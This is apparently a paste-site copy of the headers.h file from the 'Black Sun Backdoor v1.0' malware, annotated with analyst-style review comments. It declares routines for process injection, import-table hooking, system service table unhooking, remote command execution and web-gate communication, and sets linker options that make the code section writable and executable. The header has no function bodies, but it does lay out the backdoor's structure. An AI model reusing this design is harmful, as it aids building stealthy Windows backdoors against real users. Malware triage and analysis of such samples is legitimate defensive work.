FlyFar

src/headers.h

May 17th, 2024
C 3.13 KB | Cybersecurity | 0 0
  1. /*
  2.  *  ---------------------------------------------------------------------
  3.  *         ____  _            _     _____            
  4.  *        |  _ \| |          | |   / ____|            
  5.  *        | |_) | | __ _  ___| | _| (___  _   _ _ __  
  6.  *        |  _ <| |/ _` |/ __| |/ /\___ \| | | | '_ \
  7.  *        | |_) | | (_| | (__|   < ____) | |_| | | | |
  8.  *        |____/|_|\__,_|\___|_|\_\_____/ \__,_|_| |_|
  9.  *               Black Sun Backdoor v1.0 prebeta        
  10.  *
  11.  *                    (x) Cytech 2007
  12.  *
  13.  *  ---------------------------------------------------------------------
  14.  *  [headers.h]
  15.  *     typedefines, libraries, headers, linker options etc...
  16.  *  ---------------------------------------------------------------------
  17.  */
  18.  
  /*
   * MSVC auto-link directives: each #pragma comment(lib, ...) records a library
   * name in the object file so the linker pulls it in without a project entry.
   * For triage, the set shows which API families the binary can import:
   * Winsock (ws2_32), HTTP/URL client APIs (wininet, urlmon), registry/service/
   * security APIs (advapi32) and PE image helpers (imagehlp).
   * Which functions are actually called is not visible in this header.
   */
  19. #pragma comment(lib,"user32.lib")
  20. #pragma comment(lib,"kernel32.lib")
  21. #pragma comment(lib,"ws2_32.lib")    // Winsock 2 sockets
  22. #pragma comment(lib,"wininet.lib")   // WinINet HTTP/FTP client
  23. #pragma comment(lib,"urlmon.lib")    // URL moniker APIs
  24. #pragma comment(lib,"WinMM.lib")     // multimedia APIs
  25. #pragma comment(lib,"advapi32.lib")  // registry, services, security
  26. #pragma comment(lib,"imagehlp.lib")  // PE image helper routines
  27.  
  28. #include <windows.h>
  29. #include <wininet.h>
  30. #include <ntsecapi.h>
  31. #include <tlhelp32.h>
  32. #include <imagehlp.h>
  33. #include <aclapi.h>
  34. #include "ntdll.h"
  35.  
  /*
   * Compiler and linker settings embedded in the source (MSVC only).
   * Together they shrink the image and give it a non-default PE layout:
   * .rdata, .text and .reloc are merged into .data, and execute/write/read
   * access is requested for .text. The likely result is a single section
   * that is both writable and executable, which static PE scanners commonly
   * flag. NOTE(review): confirm the final section table on a built sample.
   */
  36. #pragma optimize("gsy", on)  // g: global optimizations, s: favor small code, y: omit frame pointers
  37.  
  38. #pragma comment(linker, "/RELEASE")  // have the linker write the PE header checksum
  39. #pragma comment(linker, "/ENTRY:WinMain")  // WinMain is the raw entry point instead of the CRT startup routine
  40. #pragma comment(linker, "/BASE:0x29A00000") // baseaddr: do not edit -- fixed preferred load address; NOTE(review): presumably other code assumes this value, confirm
  41. #pragma comment(linker, "/MERGE:.rdata=.data")  // fold read-only data into .data
  42. #pragma comment(linker, "/MERGE:.text=.data")   // fold code into .data
  43. #pragma comment(linker, "/MERGE:.reloc=.data")  // fold relocations into .data
  44. #pragma comment(linker, "/SECTION:.text,EWRX")  // E/W/R: request execute, write and read access
  45. #pragma comment(linker, "/IGNORE:4078")  // silence LNK4078 (sections merged with differing attributes)
  46. #pragma comment(linker, "/FILEALIGN:0x200")  // 512-byte on-disk section alignment, for a smaller file
  47. #pragma comment(linker, "/SUBSYSTEM:WINDOWS")  // GUI subsystem: no console window is created
  48.  
  49.  
  50.  
  /*
   * Forward declarations for routines whose definitions are not in this file
   * (presumably in the project headers this file includes; confirm there).
   * All but ReadSST are `static`, i.e. internal linkage in each translation
   * unit that includes this header. Going by the names only, they cover
   * import-address-table replacement, injection into other processes,
   * command execution and sending data over a socket; behaviour must be
   * confirmed against the definitions.
   */
  51. static DWORD WINAPI SetUpStealthHooks(HANDLE hmodCaller);
  52. static DWORD WINAPI StealthMain(LPVOID lpParam);  // LPVOID -> DWORD WINAPI: same shape as LPTHREAD_START_ROUTINE
  53. static BOOL StartProcInject(DWORD dwPid, LPTSTR p_Name);  // NOTE(review): conflicts with the 3-argument DWORD declaration below when compiled as C; as C++ the two are overloads
  54. static DWORD WINAPI ClientSend(char *Data, SOCKET zsock);
  55. static HANDLE WINAPI StartThread(LPTHREAD_START_ROUTINE lpStartAddress, LPVOID param);
  56. static DWORD WINAPI ReplaceIAT(PCSTR pszCModName, PROC pfnCurrent, PROC pfnNew, HMODULE hCModule);
  57. static DWORD WINAPI ReplaceIATEntryInAllMods(PCSTR pszCModName, PROC pfnCurrent, PROC pfnNew);
  58. static DWORD WINAPI ExecuteCMD(char *command);
  59. static DWORD GetPIDbyName(LPTSTR p_Name);
  60. static DWORD ProcessInject(HANDLE p_handle, DWORD (WINAPI f_Main)(LPVOID));  // function-typed parameter is adjusted to a function pointer
  61. static DWORD StartProcInject(DWORD dwPid, LPTSTR p_Name, DWORD (WINAPI f_Main)(LPVOID));  // second declaration of this name; return type and arity differ from the one above
  62. static DWORD WINAPI InjectAllProcesses(DWORD (WINAPI f_Main)(LPVOID));
  63. BOOL ReadSST(PDWORD);  // only non-static prototype here (external linkage); parameter is unnamed
  64.  
  /*
   * Pointer type for a WINAPI function that takes (LPDWORD, DWORD) and
   * returns BOOL. The parameter list matches WinINet's
   * InternetGetConnectedState. NOTE(review): a function-pointer typedef like
   * this is typically filled at run time (e.g. via GetProcAddress), which
   * would keep the call out of the static import table -- confirm in internet.h.
   */
  65. typedef BOOL(WINAPI* INETCHECKPROC) // internet.h -> CheckInternetConnection()
  66. (
  67.     LPDWORD lpdwFlags,   // out: receives connection-state flags
  68.     DWORD dwReserved     // reserved argument
  69. );
  70.  
  /*
   * Project-local headers, included after the prototypes and typedef above.
   * NOTE(review): the per-file comments suggest these headers carry the
   * implementations (a single-translation-unit build) -- confirm by opening them.
   * The module list doubles as a capability inventory for analysis.
   */
  71.     #pragma comment(lib,"ntdll.lib")  // link the ntdll import library (native API; see "ntdll.h")
  72.  
  73.     #include    "conf.h"        // configuration
  74.     #include    "strings.h"     // author's own helper functions (project-local file, quoted include)
  75.     #include    "internet.h"    // internet functions
  76.     #include    "functions.h"   // autorun, self-delete, execute
  77.     #include    "backdoor.h"    // backdoor functions
  78.     #include    "webgate.h"     // communication with the web gate
  79.     #include    "iathooking.h"  // import address table hooking
  80.     #include    "inject.h"      // process injection
  81.    
  82.     #include    "r0.h"          // SST unhook #1 (presumably "r0" = ring 0; confirm)
  83.     #include    "sst.h"         // SST unhook #2 (SST: presumably the system service table; confirm)
  84.  